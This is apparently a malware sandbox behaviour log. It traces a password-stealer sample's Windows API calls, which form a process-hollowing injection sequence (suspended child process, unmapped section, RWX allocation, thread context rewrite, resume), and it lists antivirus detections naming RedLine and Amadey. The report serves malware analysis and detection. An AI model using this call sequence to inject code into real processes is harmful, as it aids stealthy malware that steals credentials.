protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
3221225496 0

CreateProcessInternalW

thread_identifier: 1400
thread_handle: 0x000002b8
process_identifier: 320
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c6805445.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217740 (CREATE_NO_WINDOW|CREATE_SUSPENDED|DETACHED_PROCESS)
inherit_handles: 0
process_handle: 0x000002bc
1 1 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 917504
process_identifier: 320
process_handle: 0x000002bc
3221225497 0

NtAllocateVirtualMemory

process_identifier: 320
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtGetContextThread

thread_handle: 0x000002b8
1 0 0

NtSetContextThread

registers.eip: 1995571652
registers.esp: 6159576
registers.edi: 0
registers.eax: 4281823
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b8
process_identifier: 320
1 0 0

NtResumeThread

thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 320
1 0 0

CreateProcessInternalW

thread_identifier: 2672
thread_handle: 0x00000350
process_identifier: 2716
current_directory: C:\Users\test22\AppData\Local\Temp\IXP001.TMP
filepath: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000034c
1 1 0

NtResumeThread

thread_handle: 0x00000184
suspend_count: 1
process_identifier: 2444
1 0 0

NtResumeThread

thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 2444
1 0 0

NtResumeThread

thread_handle: 0x0000023c
suspend_count: 1
process_identifier: 2444
1 0 0

NtResumeThread

thread_handle: 0x00000278
suspend_count: 1
process_identifier: 2444
1 0 0

NtGetContextThread

thread_handle: 0x00000188
1 0 0

NtGetContextThread

thread_handle: 0x00000188
1 0 0

NtResumeThread

thread_handle: 0x00000188
suspend_count: 1
process_identifier: 2444
1 0 0

NtResumeThread

thread_handle: 0x0000028c
suspend_count: 1
process_identifier: 2444
1 0 0

NtResumeThread

thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 2444
1 0 0

Elastic malicious (high confidence)
DrWeb Trojan.PWS.StealerNET.125
CAT-QuickHeal Trojan.GenericFC.S30114712
McAfee Trojan-FRAX!16A9605D6FE0
Malwarebytes Generic.Trojan.Injector.DDS
Cybereason malicious.e8a7db
Cyren W32/Kryptik.JKR.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 multiple detections
APEX Malicious
ClamAV Win.Trojan.Redline-9938775-1
Kaspersky HEUR:Trojan.Win32.Generic
SUPERAntiSpyware Trojan.Agent/Gen-Downloader
Avast Win32:TrojanX-gen [Trj]
Tencent Trojan-Psw.Win32.Stealer.16000501
F-Secure Heuristic.HEUR/AGEN.1362350
VIPRE Gen:Variant.Zusy.456486
McAfee-GW-Edition BehavesLike.Win32.AgentTesla.tc
Trapmine malicious.high.ml.score
SentinelOne Static AI - Malicious SFX
Avira HEUR/AGEN.1362350
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Gridinsoft Trojan.Win32.Amadey.dg!se47453
ZoneAlarm HEUR:Trojan.Win32.Generic
GData MSIL.Trojan-Stealer.Redline.G
Cynet Malicious (score: 99)
ALYac Gen:Variant.MSILHeracles.82025
Cylance unsafe
Rising Malware.Obfus/MSIL@AI.100 (RDM.MSIL2:wo6V9sgmcqy0gjhgStmqTA)
Ikarus Trojan.Spy.Stealer
Fortinet MSIL/Agent.DFY!tr
AVG Win32:TrojanX-gen [Trj]
DeepInstinct MALICIOUS